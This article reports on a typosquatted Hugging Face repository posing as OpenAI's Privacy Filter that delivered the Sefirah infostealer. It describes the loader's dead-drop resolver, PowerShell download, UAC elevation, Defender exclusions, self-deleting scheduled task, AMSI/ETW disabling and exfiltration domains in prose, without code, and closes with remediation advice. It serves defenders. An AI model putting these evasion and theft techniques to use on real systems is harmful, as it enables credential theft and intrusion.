The Era of AI Typosquatting: How a Fake OpenAI Repository Weaponized Hugging Face
The artificial intelligence boom has revolutionized the software development lifecycle, but it has simultaneously introduced a massive, largely unregulated attack surface. In one of the most sophisticated AI supply chain attack vectors seen to date, threat actors successfully hijacked the trust associated with top-tier AI researchers to deliver devastating malware.
A malicious Hugging Face model repository masquerading as an official OpenAI release successfully breached the platform’s defenses, rapidly ascending to the #1 trending spot. By the time security teams intervened, the fake OpenAI repository on Hugging Face had accumulated over 244,000 downloads and hundreds of likes.
While early reports indicate that these massive engagement metrics were likely inflated by auto-generated bot accounts, the core reality remains alarming. The malicious namespace, specifically designated as Open-OSS/privacy-filter, was explicitly designed to prey on developers seeking OpenAI’s newly released data redaction models.
This was not a simple smash-and-grab phishing attempt. Instead, it was a highly orchestrated deployment of a Rust-based infostealer malware on Windows systems, orchestrated under the guise of machine learning evaluation workflows. Foundational details from sources like The Hacker News, Rescana, and CSO Online paint a picture of a patient, highly capable threat actor exploiting the unique vulnerabilities of modern AI model distribution.
The Catalyst: Weaponizing the OpenAI Privacy Filter Release
To understand the genius—and the danger—of this typosquatting campaign, we must look at the timeline. In late April 2026, OpenAI legitimately released a powerful open-weight model dubbed “Privacy Filter.” Hosted under the official openai/privacy-filter namespace, this bidirectional token classifier featured 1.5 billion parameters.
Its explicit purpose was to detect and redact personally identifiable information (PII) from unstructured text, offering enterprise developers a tool with a massive 128,000-token context window. The release was highly anticipated, distributed under an Apache 2.0 license, and intended for immediate corporate adoption to ensure data privacy.
The threat actors capitalized on this exact moment of high visibility and high urgency. They created the lookalike Open-OSS namespace and copied the official OpenAI model card practically verbatim. When developers rushed to Hugging Face to test the new redaction capabilities, many inevitably stumbled into the typosquatted trap.
In the fast-paced world of generative AI, the “clone-and-run” workflow is the standard operating procedure. Developers are deeply conditioned to pull repositories, install dependencies, and execute initialization scripts without conducting thorough line-by-line code reviews. The attackers knew this, embedding their initial access vector natively within the expected setup instructions.
The Dead Drop Resolver: Deconstructing the Loader Logic
Unlike legacy software supply chain attacks that hide payloads deep inside obfuscated compiled binaries, this campaign leveraged the very open-source nature of Python. According to threat intelligence reports from HiddenLayer and detailed by TechRadar, the execution chain initiated when the victim ran a seemingly benign setup script: either loader.py for Linux/macOS or start.bat for Windows environments.
The technical brilliance of loader.py lies in its operational security. Upon execution, the malicious Python loader script in AI setups immediately disabled SSL verification. It then decoded a Base64-encoded URL pointing to JSON Keeper, a legitimate, public JSON hosting service.
By utilizing JSON Keeper, the threat actors employed a classic espionage technique known as a “dead drop resolver.” This architectural choice is highly significant. It allowed the attackers to completely decouple their command-and-control (C2) instructions from the Hugging Face model registry itself.
If security researchers or Hugging Face automated scanners attempted to statically analyze the repository, they would only find a link to a benign paste service. Meanwhile, the attackers could dynamically update the JSON payload hosted on JSON Keeper at any time, pivoting their attack infrastructure and bypassing static blocklists without ever altering the repository code.
Privilege Escalation and Evasion Mechanics
Once the payload instruction was retrieved from the dead drop, the execution chain pivoted into native system exploitation. The JSON payload commanded the Python script to trigger a hidden, Base64-encoded PowerShell command.
This PowerShell command subsequently reached out to an attacker-controlled remote server, specifically api.eth-fastscan[.]org, to pull down a secondary batch script. This is where the attack shifted from basic code execution to a deeply embedded system compromise.
The secondary batch script elevated its own privileges by intentionally triggering a User Account Control (UAC) prompt. Relying on the developer’s assumption that the “OpenAI” model simply required administrative rights to configure local environments, many victims clicked “Yes.”
Armed with elevated privileges, the script systematically dismantled local defenses. It added aggressive exclusions to Microsoft Defender Antivirus to ensure the final payload would not be quarantined. Furthermore, it configured a scheduled task on the host machine designed to mimic a background Microsoft Edge update.
This scheduled task was uniquely configured. As The Hacker News highlighted in their breakdown, the scheduled task was not meant for long-term persistence. Instead, it was utilized as a “one-shot SYSTEM-context launcher.” After triggering the final executable, the malware waited exactly two seconds and then completely deleted the scheduled task. By destroying the task before the next system reboot, the attackers successfully evaded behavioral persistence monitoring tools that flag suspicious long-term startup routines.
The Rust-Based Sefirah Infostealer
The culmination of this complex kill chain was the deployment of “Sefirah,” a highly capable Rust-based infostealer. Rust is increasingly favored by modern malware authors due to its memory safety features, cross-platform compilation capabilities, and the difficulty reverse-engineers face when analyzing its complex, LLVM-compiled binaries.
Sefirah did not waste time once it achieved execution. The infostealer’s primary objective was the wholesale exfiltration of high-value developer secrets. It aggressively targeted Chromium and Gecko-based web browsers, stripping out cookies, saved passwords, encryption keys, and active session tokens.
Because modern corporate environments often rely on multi-factor authentication (MFA), stealing a password is no longer sufficient. By exfiltrating raw session cookies, the attackers could execute “pass-the-cookie” attacks, entirely bypassing MFA requirements to access corporate cloud consoles and internal applications.
The payload also specifically hunted for Discord local storage tokens, FileZilla FTP configurations, VPN credentials, and SSH master keys. Furthermore, it aggressively parsed the local filesystem for cryptocurrency wallet extensions and plaintext seed phrases, highlighting a dual motive of corporate espionage and direct financial theft.
To protect its operations, Sefirah executed rigorous anti-analysis checks. It verified that it was not running within a virtual machine or a researcher’s sandbox. It actively sought out connected debuggers. More aggressively, it attempted to forcefully blind the operating system by disabling the Windows Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW), effectively shutting off the telemetry that Endpoint Detection and Response (EDR) platforms rely on.
All successfully harvested data was bundled into JSON format and exfiltrated via HTTP POST requests to a final C2 domain, recargapopular[.]com.
The Silver Fox Connection: A Pivot to the AI Supply Chain
Perhaps the most fascinating element of this incident is the underlying threat actor attribution. While the attack on Hugging Face appears novel, the infrastructure points to an established, highly aggressive advanced persistent threat.
Researchers tracing the activity surrounding the api.eth-fastscan[.]org domain made a critical discovery. This exact same domain was simultaneously observed serving a completely different executable (o0q2l47f.exe), which was beaconing back to a C2 server at welovechinatown[.]info.
This secondary infrastructure is notorious within the threat intelligence community. It has been conclusively linked to prior campaigns distributing “ValleyRAT” (specifically the Winos 4.0 variant). ValleyRAT is a modular remote access trojan exclusively attributed to a sophisticated Chinese hacking collective known as “Silver Fox.”
Historically, Silver Fox has relied on SEO poisoning and traditional phishing emails to distribute their payloads. Recently, they were spotted utilizing malicious npm packages in JavaScript environments. Their sudden pivot to the Hugging Face model registry represents a massive escalation.
This indicates that top-tier threat actors have recognized that machine learning artifacts represent a soft underbelly in enterprise security. By exploiting the hype surrounding Generative AI, these groups can bypass hardened perimeter defenses and land their payloads directly onto the high-powered, highly privileged workstations of corporate data scientists and AI engineers.
The Failure of Traditional SCA and the Call for AI-BOMs
This incident lays bare a fundamental flaw in how the cybersecurity industry currently approaches supply chain defense. For the past decade, the industry has heavily invested in Software Composition Analysis (SCA) tools. These tools are excellent at scanning package.json or requirements.txt files to identify known vulnerabilities (CVEs) in open-source libraries.
However, traditional SCA tools are completely blind to the risks posed by modern AI artifacts. AI model repositories do not just contain code libraries; they contain massive arrays of serialized weights, custom inference scripts, and complex Python loaders. As noted by analysts at Gartner in CSO Online, traditional SCA was designed to inspect dependency manifests, not the nuanced, executable behaviors concealed within a machine learning model’s setup files.
This glaring gap has prompted a fierce debate among security professionals. On one side are the proponents of frictionless innovation, arguing that platforms like Hugging Face have democratized AI exactly because they allow instant, barrier-free access to bleeding-edge models.
On the other side are cybersecurity purists who argue that the current state of public AI repositories is fundamentally reckless. There is a growing consensus that enterprises must implement strict, registry-layer governance. This includes the mandatory adoption of the AI Bill of Materials (AI-BOM). An AI-BOM would provide cryptographic verification of a model’s origin, a strict inventory of its training data provenance, and a detailed map of its executable components.
Mitigating the Blast Radius
For organizations that interacted with the Open-OSS/privacy-filter repository, the remediation required is extensive. The presence of Sefirah on a developer’s machine means that simple antivirus quarantines are insufficient.
Because the infostealer explicitly targeted session tokens and SSH keys, any system that ran the fake loader must be considered catastrophically compromised. Security teams must enforce immediate, bare-metal reimaging of the affected endpoints. Furthermore, because stolen session tokens can be used from remote attacker infrastructure, simply wiping the laptop does not stop the bleeding.
Organizations must comprehensively rotate all exposed credentials, aggressively invalidate all active browser sessions across cloud environments, and replace all cryptographic keys that resided on the affected host. Network telemetry should be heavily scrutinized for any historical outbound connections to the known indicators of compromise, specifically api.eth-fastscan[.]org and recargapopular[.]com.
Conclusion: A Wake-Up Call for the AI Ecosystem
The typosquatting of the OpenAI Privacy Filter is a watershed moment for artificial intelligence security. It proves that the same supply chain vulnerabilities that have plagued npm, PyPI, and RubyGems have successfully migrated to the machine learning ecosystem.
As developers continue to rapidly integrate open-source AI models into enterprise applications, they must abandon the blind trust currently afforded to platforms like Hugging Face. Unless the industry collectively transitions toward cryptographically signed models, strict AI-BOM mandates, and behavior-aware artifact scanning, the AI revolution will continue to serve as a highly lucrative delivery mechanism for the world’s most advanced cybercriminals.